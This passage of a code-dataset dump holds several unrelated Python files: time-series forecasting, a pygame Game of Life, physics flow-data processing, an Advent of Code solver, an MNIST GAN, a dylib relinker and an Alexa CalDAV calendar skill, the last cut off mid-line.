exists']\n","sub_path":"projects/golem_api/tests/test/rename_test_dest_exists.py","file_name":"rename_test_dest_exists.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"444472151","text":"from functools import reduce\r\nfrom statsmodels.tsa.api import ExponentialSmoothing, SimpleExpSmoothing, Holt, SARIMAX\r\nimport pandas as pd\r\nimport datetime\r\nfrom matplotlib import pyplot as plt\r\nimport requests\r\nimport io\r\nfrom sklearn.metrics import mean_squared_error as rms\r\nimport numpy as np\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\nimport math\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import LSTM\r\n\r\ndef sarima(data,steps):\r\n model=SARIMAX(endog=data.values,order=(2,0,1),seasonal_order=(0,1,1,7),enforce_invertibility=False)\r\n sarima_fit= model.fit()\r\n print(sarima_fit.summary())\r\n\r\n # Rolling Forecast\r\n \r\n # Number of days to Forecast Parameter\r\n end =int(0.2*len(data))\r\n values = data[:-end]\r\n actual_values = data[len(data)-end:]\r\n pred_values=[]\r\n indexes=data[len(data)-end:].index\r\n\r\n for i in range(end):\r\n model = ARIMA((values),(2, 0, 1))\r\n arima_fit= model.fit()\r\n \r\n fnext = arima_fit.forecast()[0][0] \r\n pred_values.append(fnext)\r\n values = data[:len(data)-end+i+1] # grow the training window by the point just observed before re-fitting\r\n\r\n 
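# collect the one-step-ahead forecasts as a Series aligned to the hold-out index\r\n 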
pred_values=pd.Series(pred_values)\r\n pred_values.index=indexes\r\n\r\n #Doubt\r\n #pred_values=pred_values.shift(-1)[:]\r\n\r\n # mean_squared_error returns the MSE, so take the square root to report an actual RMSE\r\n rmse = math.sqrt(rms(actual_values,pred_values))\r\n print(\"RMSE VALUE\",rmse)\r\n #print(actual_values,pred_values)\r\n print(len(pred_values))\r\n return { \"model\":\"Baseline\",\"index\":list(indexes), \"actual\":list(actual_values.values), \"predicted\":list(pred_values),\"rmse\":rmse}\r\n\r\ndef transform_supervised(dat,lag=1):\r\n x=dat.shift(lag)\r\n y=dat\r\n return x,y \r\n\r\ndef scale_data(df):\r\n mx=MinMaxScaler()\r\n df[\"x\"]=mx.fit_transform(np.asarray(df[\"x\"]).reshape(-1,1))\r\n return mx,df \r\n\r\ndef inverse_scale_data(mx,df):\r\n df[\"x\"]=mx.inverse_transform(np.asarray(df[\"x\"]).reshape(-1,1))\r\n return mx,df \r\n\r\ndef fit_lstm(df, batch_size, nb_epoch, neurons):\r\n x, y = df.iloc[:,:-1], df.iloc[:, -1]\r\n x = np.asarray(x).reshape(x.shape[0], 1, x.shape[1])\r\n model = Sequential()\r\n model.add(LSTM(neurons, batch_input_shape=(batch_size, x.shape[1], x.shape[2]), stateful=True))\r\n model.add(Dense(1))\r\n model.compile(loss='mean_squared_error', optimizer='adam')\r\n for i in range(nb_epoch):\r\n model.fit(x, y, epochs=1, batch_size=batch_size, verbose=0, shuffle=False)\r\n model.reset_states()\r\n return x,model\r\n\r\ndef lstm(data,steps):\r\n print(data,steps)\r\n indexes=data.index\r\n end =int(0.2*len(data))\r\n train, test = data[0:-end], data[-end:]\r\n\r\n x,y=transform_supervised(train)\r\n\r\n df = pd.concat([x,y],axis=1)\r\n df.columns=[\"x\",\"y\"]\r\n df.fillna(0,inplace=True)\r\n mx,df=scale_data(df)\r\n\r\n x,lstm_model = fit_lstm(df, 1, 5, 40)\r\n # forecast the entire training dataset to build up state for forecasting\r\n #train_reshaped = train_scaled[:, 0].reshape(len(train_scaled), 1, 1)\r\n testx,testy=transform_supervised(test)\r\n\r\n df1 = pd.concat([testx,testy],axis=1)\r\n df1.columns=[\"x\",\"y\"]\r\n df1.fillna(0,inplace=True)\r\n # reuse the scaler fitted on the training split; fitting a second scaler on the test split would leak test statistics\r\n df1[\"x\"] = mx.transform(np.asarray(df1[\"x\"]).reshape(-1,1))\r\n testx, testy = df1.iloc[:,:-1], df1.iloc[:, -1]\r\n testx = np.asarray(testx).reshape(testx.shape[0], 1, testx.shape[1])\r\n\r\n pred_values = lstm_model.predict(testx, batch_size=1)\r\n \r\n rmse = math.sqrt(rms(testy,pred_values))\r\n \r\n print(\"RMSE VALUE : \",rmse)\r\n return { \"model\":\"LSTM\",\"index\":list(indexes[-end:]), \"actual\":list(testy), \"predicted\":reduce(lambda x,y: x+y,pred_values.tolist()),\"rmse\":rmse}","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"511037758","text":"import numpy as np\nimport pygame\nimport time\n\n\n## <-------GRID SETUP------->\nROWS = 200\nCOLS = 200\ntilewidth = 4\ntileheight = 4\nmargin = 0\nmygrid = np.zeros((ROWS,COLS))\nmygrid = np.pad(mygrid,1,constant_values=0) ##pads the array so that it can be shifted later\n\n\n#----WINDOW SETTINGS---->\nWIDTH = (COLS+2)*(tilewidth+margin)\nHEIGHT = (ROWS+2)*(tileheight+margin)\n\n\n#<----COLOURS---->\nWHITE = (255,255,255)\nBLACK = (0,0,0)\n\n\n#<----SETUP PYGAME WINDOW---->\npygame.init()\npygame.display.set_caption(\"Game of Life V3\")\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\nclock = pygame.time.Clock()\nfps = 60\nrunning = False\n\n\n##<-------FUNCTIONS------->\ndef event_handler():\n global run\n global running\n global mygrid\n global changes\n global index\n\n if event.type == pygame.QUIT:\n run = False\n running = False\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_r: ## 
reset grid and display\n screen.fill(BLACK)\n mygrid = np.zeros((ROWS,COLS))\n mygrid = np.pad(mygrid,1,constant_values=0)\n\n elif event.key == pygame.K_q: ## create random grid and update display\n screen.fill(BLACK)\n mygrid = np.random.randint(2,size=(ROWS,COLS))\n mygrid = np.pad(mygrid,1,constant_values=0)\n changes=[]\n index=0\n full_update_display(mygrid)\n\n elif event.key == pygame.K_KP_PLUS: ## runs a single step in the simulation\n changes=[]\n index=0\n mygrid = update_mygrid(mygrid)\n\n else:\n running = not running ## starts/stops running program\n\n pressed = pygame.mouse.get_pressed()\n if pressed[0]:\n pos = pygame.mouse.get_pos()\n x, y = pos\n column = x // (tilewidth + margin)\n row = y // (tileheight + margin)\n mygrid[row,column] = 1\n cell = pygame.Rect([margin + (margin + tilewidth) * column, margin + (margin + tileheight) * row, tilewidth, tileheight])\n pygame.draw.rect(screen, WHITE, cell)\n pygame.display.update(cell)\n\n elif pressed[2]:\n pos = pygame.mouse.get_pos()\n x, y = pos\n column = x // (tilewidth + margin)\n row = y // (tileheight + margin)\n mygrid[row,column] = 0\n cell = pygame.Rect([margin + (margin + tilewidth) * column, margin + (margin + tileheight) * row, tilewidth, tileheight])\n pygame.draw.rect(screen, BLACK, cell)\n pygame.display.update(cell)\n\n\ndef get_shifted(grid):\n ulshift = np.roll(grid,(-1,-1),axis=(0,1))\n ushift = np.roll(grid,(-1,0),axis=(0,1))\n urshift = np.roll(grid,(-1,1),axis=(0,1))\n rshift = np.roll(grid,(0,1),axis=(0,1))\n drshift = np.roll(grid,(1,1),axis=(0,1))\n dshift = np.roll(grid,(1,0),axis=(0,1))\n dlshift = np.roll(grid,(1,-1),axis=(0,1))\n lshift = np.roll(grid,(0,-1),axis=(0,1))\n shifted_grids = np.array([ulshift,ushift,urshift,rshift,drshift,dshift,dlshift,lshift])\n return shifted_grids\n\n\ndef update_cell(state, neighbours):\n if state == 1: ## if cell is alive\n if neighbours == 2 or neighbours == 3:\n return 1\n else: ## if cell is dead\n if neighbours == 3:\n return 1\n return 0\nupdate_cell = np.frompyfunc(update_cell, 2, 1) ##converts function into a ufunc\n\n\ndef update_mygrid(grid):\n shifted_grids = get_shifted(grid)\n neighbour_grid = shifted_grids[:,1:-1,1:-1].sum(0).flatten() ##for each cell it gets the number of living neighbours this array is then flattened into a 1d array\n newgrid = grid[1:-1,1:-1].flatten() ##unpads array and flattens into a 1d array\n newgrid = update_cell(newgrid, neighbour_grid).reshape(ROWS, COLS)\n newgrid = np.pad(newgrid, 1, constant_values=0)\n update_display(grid.flatten(), newgrid.flatten())\n pygame.display.update()\n return newgrid\n\n\nindex = 0\nchanges = []\ndef update_display(grid, newgrid):\n global index\n global changes\n\n if newgrid != grid:\n if newgrid == 1:\n color = WHITE\n else:\n color = BLACK\n row = index//(COLS+2) ## this is the number of WHOLE columns that would fit aka row index\n column = index%(COLS+2) ## this is the remainder when you try to divide by column length aka column index\n cell = pygame.Rect([margin + (margin+tilewidth)*column, margin + (margin+tileheight)*row, tilewidth, tileheight])\n pygame.draw.rect(screen, color, cell)\n changes.append(cell)\n index +=1\nupdate_display = np.frompyfunc(update_display, 2, 0) ##converts function into a ufunc\n\ndef full_update_display(newgrid):\n for row in range(ROWS):\n for column in range(COLS):\n if newgrid[row][column] == 1:\n color = WHITE\n else:\n color = BLACK\n pygame.draw.rect(screen, color, [margin + (margin + tilewidth) * column, margin + (margin + tileheight) * row, 
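# rect layout: [x, y, width, height] in pixels\n 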
tilewidth, tileheight])\n pygame.display.flip()\n\n#<----RUN PROGRAM IN PYGAME---->\nrun = True\nwhile run:\n clock.tick(fps)\n for event in pygame.event.get():\n event_handler()\n\n while running: ## running the actual simulation\n for event in pygame.event.get():\n event_handler()\n\n s=time.perf_counter()\n mygrid = update_mygrid(mygrid) ##updates grid and display once\n index=0 ##resets variables used to update grid\n changes=[]\n print(1/(time.perf_counter()-s))\n\n pygame.display.update()","sub_path":"game of life v2.py","file_name":"game of life v2.py","file_ext":"py","file_size_in_byte":5453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"329967649","text":"#\n# PbPb_hadrons.py\n# Collective flows\n#\n# Created by Vladislav Lyalin on 6.04.16.\n#\n\n# datafile v2hadrons.txt is taken from Pi0 corr/Scripts/V2/PbPb\n# datafiles hM-N.txt is taken from https://inspirehep.net/record/1127497\n\n# TODO: make code run from any system\n\nimport pandas as pd\nimport numpy as np\nimport ROOT\nimport re\n\nproject_directory = '/Users/Vlad/Desktop/Collective flows'\nsupplementary_functions_directory = project_directory + '/Code'\n\nimport sys\n\nsys.path.insert(0, supplementary_functions_directory)\nimport supplementary_functions as supp\n\ndef process_data(save_data=True, print_graphs=False):\n process_V2_data(save_data=save_data, print_graphs=print_graphs)\n process_yields_data(save_data=save_data, print_graphs=print_graphs)\n\n\ndef process_V2_data(save_data=False, print_graphs=False):\n \"\"\"\n Devide Pb-Pb hadrons V2 file into 6 files with various centralities\n Save to 'Processed Data/Pb-Pb/Hadrons/V2/' as a pandas-friendly .csv\n If print_graphs save graphs as .png\n \"\"\"\n\n filepath = project_directory + '/Raw Data/Pb-Pb/Hadrons/V2/v2hadrons.txt'\n savepath = project_directory + '/Processed Data/Pb-Pb/Hadrons/V2/'\n name = 'Pb-Pb_Hadrons_V2_C%i'\n\n data = pd.read_table(filepath)\n\n # v2hadrons.txt headers:\n # range(0, 33)\n #\n # v2hadrons.txt structure:\n #\n # xv x_min x_max\n # yv_c0 syv1_c0 syv2_c0 stv1_c0 stv2_c0\n # yv_c1 syv1_c1 syv2_c1 stv1_c1 stv2_c1\n # yv_c2 syv1_c2 syv2_c2 stv1_c2 stv2_c2\n # yv_c3 syv1_c3 syv2_c3 stv1_c3 stv2_c3\n # yv_c4 syv1_c4 syv2_c4 stv1_c4 stv2_c4\n # yv_c5 syv1_c5 syv2_c5 stv1_c5 stv2_c5\n #\n # all that in one line\n #\n # c for centrality: 0=0-5%, 1=5-10%, 2=10-20%, 3=20-30%, 4=30-40%, 5=40-50%\n\n centralities = [0, 5, 10, 20, 30, 40]\n headers = ['pT', 'pT min', 'pT max', 'V2', 'stat +', 'stat -', 'sys +', 'sys -']\n x = data[[0, 1, 2]]\n x.columns = ['pT', 'pT min', 'pT max']\n\n for i in xrange(3, 29, 5):\n _name = name % centralities[0]\n del(centralities[0])\n y = data.iloc[:,i:i+5]\n y.columns = ['V2', 'stat +', 'stat -', 'sys +', 'sys -']\n one_data = pd.concat([x,y], axis=1)\n if save_data:\n one_data.to_csv(savepath + _name + '.csv', index=False)\n\n if print_graphs:\n graph = supp.get_TGraph_from_data(one_data, graph_name=re.sub('_', ' ', _name))\n canvas = ROOT.TCanvas()\n graph.Draw()\n canvas.SaveAs(savepath + _name + '.png')\n\n\ndef process_yields_data(save_data=False, print_graphs=False):\n \"\"\"\n Saves yields to 'Processed Data/Pb-Pb/Hadrons/Yields/' as a pandas-friendly .csv\n \"\"\"\n filepath = project_directory + '/Raw Data/Pb-Pb/Hadrons/Yields/'\n savepath = project_directory + '/Processed Data/Pb-Pb/Hadrons/Yields/'\n name = 'Pb-Pb_Hadrons_Yield_C%i'\n\n default_headers = ['pT', 'pT min', 'pT max', 'V2', 'stat +', 'stat -', 'sys +', 'sys -']\n\n centralities = 
[0, 5, 10, 20, 30, 40] #also yield data for 50, 60, 70\n filenames = ['h0-5', 'h5-10', 'h10-20', 'h20-30', 'h30-40', 'h40-50'] # one hM-N.txt datafile per centrality bin; without 'h40-50' the zip below silently drops the 40-50% bin\n\n for centrality, filename in zip(centralities, filenames):\n _filename = filename + '.txt'\n _name = name % centrality\n strings = []\n is_comment = True\n with open(filepath + _filename, 'r') as f:\n for line in f:\n if is_comment:\n if 'x\\txlow\\txhigh\\ty\\tdy+\\tdy-\\tdy+\\tdy-' in line:\n is_comment = False\n elif line != '\\n' and line != '':\n strings.append(map(float, line.strip().split('\\t')))\n\n data = pd.DataFrame(strings, columns=default_headers)\n\n if save_data:\n data.to_csv(savepath + _name + '.csv', index=False)\n\n if print_graphs:\n graph = supp.get_TGraph_from_data(data, graph_name=re.sub('_', ' ', _name))\n canvas = ROOT.TCanvas()\n # log X-axis\n canvas.SetLogx()\n graph.Draw()\n canvas.SaveAs(savepath + _name + '.png')\n\n\ndef fit_data(print_graphs=False):\n \"\"\"\n Fit Pb-Pb hadrons V2 for various centralities and return TF1\n \"\"\"\n centralities = [0, 5, 10, 20, 30, 40]\n filepaths = project_directory + '/Processed data/Pb-Pb/Hadrons/V2/Pb-Pb_Hadrons_V2_C%i.csv'\n fit_function_string = '[0]*(1+[1]*x^1+[2]*x^2+[3]*x^3)/(1+[4]*x^1+[5]*x^2+[6]*x^3+[7]*x^4)'\n fit_function = ROOT.TF1('fit_function', fit_function_string, 0.2, 20)\n\n fit_functions = []\n\n for centrality in centralities:\n filepath = filepaths % centrality\n graph = supp.get_TGraph_from_filepath(filepath)\n\n # initial parameters for fit\n fit_function.SetParameters(0.001634, 109., -16.9, 1.894, 0.1106, -0.0433, 0.02272, 0)\n # fit_function.SetParLimits(7, -0.0001, 0.0001)\n\n graph.Fit(fit_function, 'r')\n graph.Draw('AP')\n\n if print_graphs:\n canvas = ROOT.TCanvas()\n ROOT.gStyle.SetOptFit(1)\n graph.SetTitle('Pb-Pb Hadrons V2 C%i' % centrality)\n graph.GetXaxis().SetTitle('p_{T} (GeV)')\n graph.GetYaxis().SetTitle('V2')\n graph.Draw()\n canvas.SaveAs(project_directory + '/Processed data/Pb-Pb/Hadrons/V2/Pb-Pb_Hadrons_V2_C%i_fit.png' % centrality)\n\n return fit_function\n # return graph\n","sub_path":"Older files/Code/Pb-Pb/PbPb_hadrons.py","file_name":"PbPb_hadrons.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"310670562","text":"with open(\"input\") as file:\n program = []\n for line in file:\n op, arg = line.split()\n program.append((op, int(arg)))\n\ndef execute(program):\n \"\"\"\n execute the given program.\n returns an (acc, reason) tuple. 
\n acc is the value of the accumulator.\n reason is either 'loop' or 'success' or 'out of bounds' depending on why the program ended.\n \"\"\"\n pc = 0\n acc = 0\n seen = set()\n while pc not in seen:\n seen.add(pc)\n if pc == len(program):\n return acc, \"success\"\n elif pc < 0 or pc > len(program):\n return acc, \"out of bounds\"\n op, arg = program[pc]\n if op == \"nop\":\n pass\n elif op == \"acc\":\n acc += arg\n elif op == \"jmp\":\n pc += arg - 1 #since we'll increment it after this\n pc += 1\n return acc, \"loop\"\n\n#part 1\nacc, _ = execute(program)\nprint(acc)\n\n#part 2\nfor idx, (op, arg) in enumerate(program):\n if op in (\"nop\", \"jmp\"):\n new_op = \"nop\" if op == \"jmp\" else \"jmp\"\n program[idx] = (new_op, arg)\n\n acc, reason = execute(program)\n if reason == \"success\":\n print(acc)\n break\n\n program[idx] = (op, arg)\nelse:\n print(\"No solution found.\")","sub_path":"08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"610596946","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport os\n\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport torchvision\nimport torchvision.transforms as transforms\n\n# import logger\n\n\ndef to_np(x):\n return x.data.cpu().numpy()\n\n\ndef to_variable(x):\n if torch.cuda.is_available():\n x = x.cuda()\n return autograd.Variable(x)\n\n\ndef denorm(x):\n out = (1 + x) / 2\n return out.clamp(0, 1)\n\n\ndef discriminator():\n D = nn.Sequential(\n nn.Linear(784, 256),\n nn.LeakyReLU(0.2),\n nn.Linear(256, 256),\n nn.LeakyReLU(0.2),\n nn.Linear(256, 1),\n nn.Sigmoid()\n )\n return D\n\n\ndef generator():\n G = nn.Sequential(\n nn.Linear(64, 256),\n nn.LeakyReLU(0.2),\n nn.Linear(256, 256),\n nn.LeakyReLU(0.2),\n nn.Linear(256, 784),\n nn.Tanh())\n return G\n\n\ndef train(config, dataloader, criterion, D=None, G=None, d_optimizer=None,\n g_optimizer=None, logger=None):\n for epoch in range(config.num_epochs):\n for i, (images, _) in enumerate(dataloader):\n batch_size = images.size(0)\n images = to_variable(images.view(batch_size, -1))\n\n # Train the discriminator and generator\n real_labels = to_variable(torch.ones(batch_size))\n fake_labels = to_variable(torch.zeros(batch_size))\n\n # Train D to recognize real images as real\n outputs = D(images)\n d_real_loss = criterion(outputs, real_labels)\n\n # Train D to recognize fake images as fake\n noise = to_variable(torch.randn(batch_size, 64))\n fake_images = G(noise)\n outputs = D(fake_images)\n d_fake_loss = criterion(outputs, fake_labels)\n\n # Backprop and optimize\n d_loss = d_real_loss + d_fake_loss\n D.zero_grad()\n d_loss.backward()\n d_optimizer.step()\n\n # Train G to generate real images\n noise = to_variable(torch.randn(batch_size, 64))\n fake_images = G(noise)\n outputs = D(fake_images)\n g_loss = criterion(outputs, real_labels)\n\n D.zero_grad()\n G.zero_grad()\n g_loss.backward()\n g_optimizer.step()\n\n # print training statistics\n if (i + 1) % 100 == 0:\n print('Epoch: [%d/%d], Step: [%d/%d], d_real_loss: %.3f, d_fake_loss: %.3f, g_loss: %.3f' % (\n epoch + 1, config.num_epochs, i + 1, len(dataloader), d_real_loss.data[0], d_fake_loss.data[0], g_loss.data[0]))\n\n\n '''\n # ======================== TensorBoard logging ============================= 
#\n # 1. Log the scalar values\n info = {\n 'd_real_loss': d_real_loss.data[0],\n 'd_fake_loss': d_fake_loss.data[0],\n 'g_loss': g_loss.data[0]\n }\n\n for tag, value in info.items():\n logger.scalar_summary(tag, value, i + 1)\n\n # 2. Log the values and gradients of the parameters (histogram)\n # skip for this GAN training\n\n # 3. Log the images\n\n info = {\n 'fake_images': to_np(fake_images.view(-1, 28, 28)[:10])\n }\n\n for tag, images in info.items():\n logger.image_summary(tag, images, i + 1)\n '''\n\n # save real images\n if (epoch + 1) == 1:\n images = images.view(images.size(0), 1, 28, 28)\n torchvision.utils.save_image(denorm(images.data), os.path.join(config.real_images_path, 'real_images.png'))\n\n # save sampled images\n fake_images = fake_images.view(fake_images.size(0), 1, 28, 28)\n torchvision.utils.save_image(denorm(fake_images.data), os.path.join(config.fake_images_path, 'fake_images-%d.png' % (epoch + 1)))\n\n # save model\n torch.save(D.state_dict(), os.path.join(config.model_path, 'discriminator.pkl'))\n torch.save(G.state_dict(), os.path.join(config.model_path, 'generator.pkl'))\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--num_epochs', type=int, default=200)\n parser.add_argument('--lr', type=float, default=0.0003)\n parser.add_argument('--batch_size', type=int, default=100)\n parser.add_argument('--num_workers', type=int, default=2)\n\n parser.add_argument('--model_path', type=str, default='./models')\n parser.add_argument('--real_images_path', type=str, default='./data/real_images')\n parser.add_argument('--fake_images_path', type=str, default='./data/fake_images')\n\n config = parser.parse_args()\n\n transform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))]) # MNIST images have a single channel\n dataset = torchvision.datasets.MNIST(root='./data', download=True, train=True, transform=transform)\n dataloader = torch.utils.data.DataLoader(dataset=dataset, batch_size=config.batch_size, shuffle=True)\n\n criterion = nn.BCELoss()\n\n D = discriminator()\n G = generator()\n\n if torch.cuda.is_available():\n D.cuda()\n G.cuda()\n\n d_optimizer = optim.Adam(D.parameters(), lr=config.lr)\n g_optimizer = optim.Adam(G.parameters(), lr=config.lr)\n\n # logger = logger.Logger('./logs')\n\n train(config, dataloader, criterion, D, G, d_optimizer, g_optimizer, logger=None) # no TensorBoard logger is constructed above, so pass None\n\n\n\n\n","sub_path":"GAN/gan.py","file_name":"gan.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"512490647","text":"#!/usr/bin/env python\n\nimport os\nfrom subprocess import check_output\n\nOTOOL = \"otool\"\nINT = \"install_name_tool\"\nBASE = \"@executable_path/../Frameworks/\"\n\n\nREPLACEMENTS = {\n 'libjson-c.2.dylib': 'libjson-c.dylib',\n 'libjson.0.dylib': 'libjson.dylib',\n 'libhidapi.0.dylib': 'libhidapi.dylib',\n 'libu2f-host.0.dylib': 'libu2f-host.dylib',\n 'libykpers-1.1.dylib': 'libykpers-1.dylib',\n 'libyubikey.0.dylib': 'libyubikey.dylib'\n}\n\n\ndef relink(dylib, local=[]):\n # Fix ID\n replacement = REPLACEMENTS.get(dylib, dylib)\n check_output([INT, '-id', BASE+replacement, dylib])\n\n # Relink local dylibs.\n out = check_output([OTOOL, '-L', dylib]).decode() # bytes -> str so the substring checks below work on Python 3\n for line in out.splitlines()[2:]:\n for l in local:\n l_rep = REPLACEMENTS.get(l, l)\n if l in line or l_rep in line:\n line = line.strip().split()[0]\n check_output([INT, '-change', line, BASE+l_rep, dylib])\n\n\ndef main():
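\n # Collect every dylib in the working directory; REPLACEMENTS keys are merged in\n # below so that pre-rename install names are matched as well.\n dylibs = [f for f in os.listdir('.') if 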
f.endswith('.dylib')]\n hits = list(REPLACEMENTS.keys()) + dylibs # list() so the concatenation also works on Python 3\n for lib in dylibs:\n print(lib)\n relink(lib, hits)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"resources/mac/relink.py","file_name":"relink.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"481078149","text":"import re\nimport pprint\nimport json\nimport uuid\nfrom datetime import datetime\nfrom datetime import timedelta\nimport caldav\nimport urllib3\nfrom caldav.elements import dav, cdav\nfrom calendar import monthrange\nfrom ics import Calendar\nfrom flask import Flask\nfrom flask_ask import Ask, statement, request\n\napp = Flask(__name__)\nask = Ask(app, '/')\n\n# read configuration\nwith open('./config.json') as json_data_file:\n\tconfig = json.load(json_data_file)\n\n# open log files\n#f = open('./calexa.log', 'a+')\ndef log(msg):\n#\tglobal f\n#\tf.write(msg)\n#\tf.flush()\n\tprint(msg)\n\ndef connectCalendar():\n\tglobal config\n\n\tclient = caldav.DAVClient(config[\"url\"], username=config[\"username\"], password=config[\"password\"])\n\tprincipal = client.principal()\n\tcalendars = principal.calendars()\n\n\treturn sorted(calendars, key=lambda calendar: str(calendar.url))\n\n# split away TRIGGER and VALARM fields, since the caldav library does not always parse them correctly\ndef filterEventTriggers(events):\n\tfor r in events:\n\t\tev = \"\"\n\t\tev_data = str(r._data).splitlines()\n\t\tfor line in ev_data:\n\t\t\tif not line.lstrip().startswith(\"TRIGGER\") and \":VALARM\" not in line:\n\t\t\t\tev += (line + '\\n')\n\t\tr._data = ev\n\n\treturn events\n\ndef getCalDavEvents(begin, end):\n\tcalendars = connectCalendar()\n\tspeech_text = \"\"\n\n\tif (len(calendars) <= 0):\n\t\tspeech_text = \" unfortunately I could not connect to your calendar\\n\"\n\t\tlog(\"ERROR: \" + speech_text)\n\telse:\n\t\teventList = []\n\t\tflatten = lambda l: [item for sublist in l for item in sublist]\n\n\t\tlog(\" found calendars: \" + str(len(calendars)) + \"\\n\")\n\t\ti = 0\n\t\tfor calendar in calendars:\n\t\t\tlog(\"\t[\" + str(i + 1) + \"]: \" + str(calendar))\n\t\t\tresults = calendar.date_search(begin, end)\n\n\t\t\tlog(\" -> \" + str(len(results)) + \" events \\n\")\n\t\t\tif len(results) > 0:\n\t\t\t\tresults\t= filterEventTriggers(results)\n\t\t\t\teventList = eventList + flatten([Calendar(event._data).events for event in results])\n\t\t\ti = i + 1\n\n\t\tif (len(eventList) <= 0):\n\t\t\tspeech_text = \"There are no events\"\n\t\telse:\n\t\t\tlog(\" returning \" + str(len(eventList)) + \" event(s)\\n\")\n\t\t\tsortedEventList = sorted(eventList, key=lambda icsEvent: icsEvent.begin)\n\n#\t\t\tpp = pprint.PrettyPrinter(indent=4)\n#\t\t\tpp.pprint(sortedEventList)\n\n\t\t\tspeech_text += '\\n'\n\t\t\tspeech_text += ' The following events are on your calendar:\\n'\n\t\t\tfor icsEvent in sortedEventList:\n\t\t\t\tspeech_text += ' ' + icsEvent.begin.humanize(locale='en') + ' is ' + getEventName(icsEvent) + '\\n'\n\n\treturn speech_text\n\n#@ask.intent('GetTodayEventsIntent')\n#def getTodayEvents():\n#\tspeech_text = getCalDavEvents(datetime.now(), datetime.now() + timedelta(days=1))\n#\tprint(speech_text)\n#\treturn statement(speech_text).simple_card('Calendar Events', speech_text)\n\n@ask.intent('GetEventsIntent', convert={ 'date': 'date', 'enddate': 'date' })\ndef getDateEvents(date, enddate):\n\tlog(\"Reading events!\\n\")\n\tlog(\" date (from user): \" + str(date) + \" \" + str(type(date)) + \"\\n\")\n\tlog(\" 
enddate (from user): \" + str(enddate) + \" \" + str(type(enddate)) + \"\\n\")\n\n\t# in case the default \"enddate\" does not comply with \"date\",\n\t# the enddate is set to the end of the day of \"date\"\n\tif date==None:\n\t\tdate = datetime.now()\n\n\tif enddate==None or date>=enddate:\n\t\tenddate = getEndDate(date, request.intent.slots.date.value)\n\n\tlog(\" date: \" + str(date) + \"\\n\")\n\tlog(\" endDate: \" + str(enddate) + \"\\n\")\n\n\tspeech_text = getCalDavEvents(date, enddate)\n\tlog(\" text: \" + speech_text + \"\\n\")\n\n\treturn statement(speech_text).simple_card('Calendar Events', speech_text)\n\ndef getEndDate(date, orig_date):\n\tlog(\" orig_date: \" + str(orig_date) + \" \" + str(type(orig_date)) + \"\\n\")\n\torig_date = re.sub('X$', '0', orig_date)\n\tif re.match('^\\d{4}-W\\d{2}$', orig_date):\n\t\t# this week\n\t\tendDate = date + timedelta(days=7)\n\telif re.match('^\\d{4}-W\\d{2}-WE$', orig_date):\n\t\t# this weekend\n\t\tendDate = date + timedelta(days=2)\n\telif re.match('^\\d{4}-\\d{2}$', orig_date):\n\t\t# this month\n\t\tlast_day = monthrange(date.year, date.month)[1] # monthrange() returns (first_weekday, number_of_days)\n\t\tendDate = datetime(date.year, date.month, last_day)\n\telif re.match('^\\d{4}$', orig_date):\n\t\t# this/next year\n\t\tendDate = datetime(date.year, 12, 31)\n\telse:\n\t\tendDate = datetime(date.year, date.month, date.day) + timedelta(days=1) # safe across month/year boundaries\n\n\treturn endDate\n\ndef getEventName(event):\n\t# see: https://stackoverflow.com/questions/40135637/error-unable-to-parse-the-provided-ssml-the-provided-text-is-not-valid-ssml\n\tname = event.name\n\tname = name.replace('&', ' and ')\n\tname = name.replace('*', '')\n\treturn name\n\n# We do have a minor problem here. There is no timezone information in the date/time objects...\n# ... we assume the server's timezone, but it could be that this is wrong. So if created events are off by some hour(s)\n# this is the reason. 
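(One possible fix, assuming Python 3.9+: attach an explicit zone with the standard zoneinfo module, e.g. d = d.replace(tzinfo=ZoneInfo('Europe/Berlin')); the zone name here is only an illustration.) 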
If someone wants to provide a simple PR then this would be great :-)\n@ask.intent('SetEventIntent', convert={'date': 'date', 'time':'time', 'duration' : 'timedelta'})\ndef setEvent(date, time, duration, eventtype, location):\n\tlog(\"Creating event!\\n\")\n\tlog(\" date (from user): \" + str(date) + \"\\n\")\n\tlog(\" time (from user): \" + str(time) + \"\\n\")\n\tlog(\" duration (from user): \" + str(duration) + \"\\n\")\n\tlog(\" eventtype (from user): \" + str(eventtype) + \"\\n\")\n\tlog(\" location (from user): \" + str(location) + \"\\n\")\n\tspeech_text = \"Date could not be understood!\"\n\n\tif eventtype==None:\n\t\teventtype='Meeting'\n\n\tif date==None:\n\t\tdate = datetime.today()\n\n\tif time==None:\n\t\ttime = datetime.now().time() # assumption: default to \"now\" when no time slot was given, instead of crashing in combine()\n\n\tif duration==None:\n\t\tduration = timedelta(hours=1)\n\n\td = datetime.combine(date, time)\n\n\tcreationDate = datetime.now().strftime(\"%Y%m%dT%H%M%S\")\n\tstartDate = d.strftime(\"%Y%m%dT%H%M%S\")\n\tendDate = (d + 